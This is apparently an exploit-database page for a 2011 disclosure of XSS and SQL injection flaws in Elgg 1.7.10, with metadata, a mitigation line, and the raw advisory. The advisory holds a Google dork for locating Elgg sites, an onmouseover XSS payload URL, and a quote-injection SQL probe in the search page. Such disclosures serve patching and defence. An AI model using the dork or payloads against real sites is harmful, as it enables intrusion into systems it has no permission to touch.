header-logo
Suggest Exploit
vendor:
Elgg
by:
Aung Khant
7.5
CVSS
HIGH
XSS, SQL Injection
79 (XSS), 89 (SQL Injection)
CWE
Product Name: Elgg
Affected Version From: 1.7.10
Affected Version To: 1.7.10
Patch Exists: YES
Related CWE: N/A
CPE: elgg:elgg
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities

XSS: A malicious user can inject a malicious script into the internalname parameter of the embed/media page. The script will be executed when the mouse is hovered over the page. SQL Injection: A malicious user can inject a malicious SQL query into the tag_names parameter of the search page.

Mitigation:

Input validation should be used to prevent XSS and SQL Injection attacks. Sanitize user input and escape special characters.
Source

Exploit-DB raw data:

# Exploit Title: Elgg 1.7.10 <= Multiple Vulnerabilities
# Google Dork: intext:"Powered by Elgg, the leading open source social
networking platform"
# Date: 2011-08-18
# Author: Aung Khant <YGN Ethical Hacker Group - http://yehg.net/>
# Software Link: http://elgg.org/getelgg.php?forward=elgg-1.7.10.zip
# Version: 1.7.10 <=


1.  XSS

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22



2. SQL Injection

http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location'

Navigation

Suggest Exploit

Services By CQR